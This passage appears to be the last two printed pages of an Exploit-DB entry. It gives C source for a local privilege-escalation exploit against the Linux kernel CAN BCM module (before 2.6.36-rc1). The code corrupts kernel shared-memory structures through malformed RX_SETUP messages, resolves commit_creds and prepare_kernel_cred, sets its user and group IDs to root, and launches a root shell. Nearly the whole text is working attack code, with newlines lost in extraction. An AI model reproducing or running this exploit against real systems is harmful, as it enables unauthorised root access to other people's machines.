  • 7. Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ if (ret < 0) { printf("[-] kernel rejected malformed CAN headern"); exit(1); } i = base + FILLER; cnt = i + FILLER; for (; i < cnt; ++i) { shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); } printf("[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...n"); mmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3); sock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4); efault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); printf("[+] mmap'ed mapping of length %d at %pn", mmap_len, efault); printf("[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...n"); msg = (struct bcm_msg_head *) efault; memset(msg, 0, mmap_len); msg->can_id = 2959; msg->nframes = (ALLOCATION / 16) * 4; msg->opcode = RX_SETUP; ret = send(sock, msg, mmap_len, 0); if (ret != -1 && errno != EFAULT) { printf("[-] couldn't trigger EFAULT, exploit aborting!n"); exit(1); } printf("[+] seeking out the smashed shmid_kernel...n"); i = base; cnt = i + FILLER + FILLER; for (; i < cnt; ++i) { ret = (int) shmat(shmids[i], NULL, SHM_RDONLY); if (ret == -1 && errno == EIDRM) { smashed = i; break; } } if (i == cnt) { printf("[-] could not find smashed shmid, trying running the exploit again!n"); exit(1); } printf("[+] discovered our smashed shmid_kernel at shmid[%d] = %dn", i, shmids[i]); printf("[+] re-smashing the shmid_kernel with exploit payload...n"); shmid_kernel.shm_perm.seq = shmids[smashed] / IPCMNI; buf = (char *) msg; memcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel)); msg->opcode = RX_SETUP; ret = send(sock, msg, mmap_len, 0); if (ret != -1 && errno != EFAULT) { printf("[-] couldn't trigger EFAULT, exploit aborting!n"); exit(1); } ret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY); if (ret == -1 && errno != EIDRM) { setresuid(0, 0, 0); setresgid(0, 0, 0); printf("[+] launching root shell!n"); execl("/bin/bash", "/bin/bash", NULL); exit(0); } printf("[-] exploit failed! retry?n"); } void setup(void) { printf("[+] looking for symbols...n"); commit_creds = (_commit_creds) get_symbol("commit_creds"); if (!commit_creds) { printf("[-] symbol table not availabe, aborting!n"); } prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); if (!prepare_kernel_cred) { printf("[-] symbol table not availabe, aborting!n"); } printf("[+] setting up exploit payload...n"); super_block.s_flags = 0; inode.i_size = 4096; 7 de 8 17/2/2012 14:55
  • 8. Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ inode.i_sb = &super_block; inode.inotify_watches.next = &inode.inotify_watches; inode.inotify_watches.prev = &inode.inotify_watches; inode.inotify_mutex.count = 1; dentry.d_count = 4096; dentry.d_flags = 4096; dentry.d_parent = NULL; dentry.d_inode = &inode; op.mmap = &kernel_code; op.get_unmapped_area = &kernel_code; vfsmount.mnt_flags = 0; vfsmount.mnt_count = 1; file.fu_list.prev = &file.fu_list; file.fu_list.next = &file.fu_list; file.f_dentry = &dentry; file.f_vfsmnt = &vfsmount; file.f_op = &op; shmid_kernel.shm_perm.key = IPC_PRIVATE; shmid_kernel.shm_perm.uid = getuid(); shmid_kernel.shm_perm.gid = getgid(); shmid_kernel.shm_perm.cuid = getuid(); shmid_kernel.shm_perm.cgid = getgid(); shmid_kernel.shm_perm.mode = -1; shmid_kernel.shm_file = &file; } int main(int argc, char **argv) { setup(); trigger(); return 0; } Comments No comments so far © Offensive Security 2011 8 de 8 17/2/2012 14:55